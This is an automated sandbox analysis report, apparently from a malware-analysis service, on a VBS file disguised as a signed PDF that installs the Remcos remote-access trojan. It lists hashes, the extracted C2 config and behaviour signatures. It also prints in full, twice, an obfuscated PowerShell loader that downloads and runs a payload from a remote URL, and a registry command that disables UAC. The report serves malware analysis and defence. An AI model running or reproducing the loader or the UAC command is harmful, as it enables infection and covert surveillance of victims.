Analysis

  • max time kernel
    74s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 09:11

General

  • Target

    30180908_signed·pdf.vbs

  • Size

    33KB

  • MD5

    33788adfb67a0e0bf5a5fe58cb9c5617

  • SHA1

    a62c45afa541fdcccc5c97c432c78ce55b0a7a5b

  • SHA256

    609aaa35ee7b0582cb3e1e4e9f76d647c98377dac62eca602bf318578b61576f

  • SHA512

    9da759eba3eee9ed6d1b804ed8d26f1f59831d49543e393b6adf462343d98dbefabc0314c673b31a4c52857e0d975edbb8304c0e1ee7a375fd71f446ab655a50

  • SSDEEP

    768:WuEasaYzR+s1z3NkQpyhZ6d4nl3pVVCStrppuAP:zEasd+a3iQpy/V3/UStF3P

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 15 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30180908_signed·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2828
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2004
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hajp.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1212

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    502902ac857593ef9f802af36ff2f4e0

    SHA1

    d6b2b0b6db70c4640a61c0932f5c4c988c49a42a

    SHA256

    8584ce7e463081b8efb2dc0f1246f1066795f1e369ec54557e5411c6e3fdd345

    SHA512

    afed389099833f5e97ac574082c790a878272aeb67720486a7fff6ac5fff3ae4552d068782d79f23a357bd27e4e8a87bd946a9b845781d381b8c6bca50515ab6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e9da233828dfc5f5bf0bb0b201fc775c

    SHA1

    5ef6d9a16f7630c8a71daeab70bb55dd691171e1

    SHA256

    b5dc0ac24c8ee9f8e6fd20908b8008017a1289742730557eadfe326149898aa0

    SHA512

    667ebdbcd0eba0a6b523d973151b3c73657655673406b8ecf82c63d29fd90c1ca7168bc5ddd4d1f4ccdec20da5aa1b80784034bb2587c5b74112dc4eacde5389

  • C:\Users\Admin\AppData\Local\Temp\Cab2213.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarA999.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\hajp.vbs

    Filesize

    444B

    MD5

    4b2f14d56e3b1d19e66cc4519963222b

    SHA1

    a9770866be3d2badf4c5254e00d1e6b80f8a4daf

    SHA256

    b3e0b95d4fe506afd4f8851a60dd6793cda5ad3ba0d7eee440c53f6bd987e23b

    SHA512

    b9f0568ea04cb89c1cdf4b88d43b2ff68260f58c078df33fbde1d57ba2301a909a025728635a7497c76bb0c4b3dfa85fe60d63649fd042e745d21be77ed7fae6

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QODPE21NVZ6RA2K7AESP.temp

    Filesize

    7KB

    MD5

    37926af74b5349d1ec3d83d98d3fb809

    SHA1

    6e9521883ac2b974ccc85d11bc00f65ee8233cfb

    SHA256

    1775adee92e15f252c21c4acef85e05ebccc4da0fdf06c3ca5e7ff0a87732daa

    SHA512

    648851611bf85a149df758548a8623b1967b11875698f9146739d8219a6325ab3601f56aa39e67a3145a7892b6ab75a324ace51b37d7b97918e045e88d7cdb1c

  • C:\Users\Admin\AppData\Roaming\Superspecialists.Won

    Filesize

    426KB

    MD5

    8a3cfa45f3daf3318ee35fbc24637ccd

    SHA1

    a4a2f7a664f7839ede5e3a38cd303c50ac4db90d

    SHA256

    13345dbc875ba768cb21aadf3b3127c0cd7b9278f1460f8bac7b2c382ac6bc6d

    SHA512

    a35d23894c58a3613fee2426974a2626ecdc410d254055a3a704f03ed54f64162bde5be672c4f706039f810e125610fb62ed941df6f4f4fa51ba9da12299e111

  • memory/1632-62-0x0000000000820000-0x0000000001882000-memory.dmp

    Filesize

    16.4MB

  • memory/1632-60-0x0000000000820000-0x0000000001882000-memory.dmp

    Filesize

    16.4MB

  • memory/1892-37-0x00000000067E0000-0x0000000009E93000-memory.dmp

    Filesize

    54.7MB

  • memory/2828-24-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-31-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-33-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-29-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-28-0x000007FEF6EFE000-0x000007FEF6EFF000-memory.dmp

    Filesize

    4KB

  • memory/2828-27-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-26-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-25-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-23-0x000007FEF6C40000-0x000007FEF75DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2828-22-0x0000000001E90000-0x0000000001E98000-memory.dmp

    Filesize

    32KB

  • memory/2828-21-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2828-20-0x000007FEF6EFE000-0x000007FEF6EFF000-memory.dmp

    Filesize

    4KB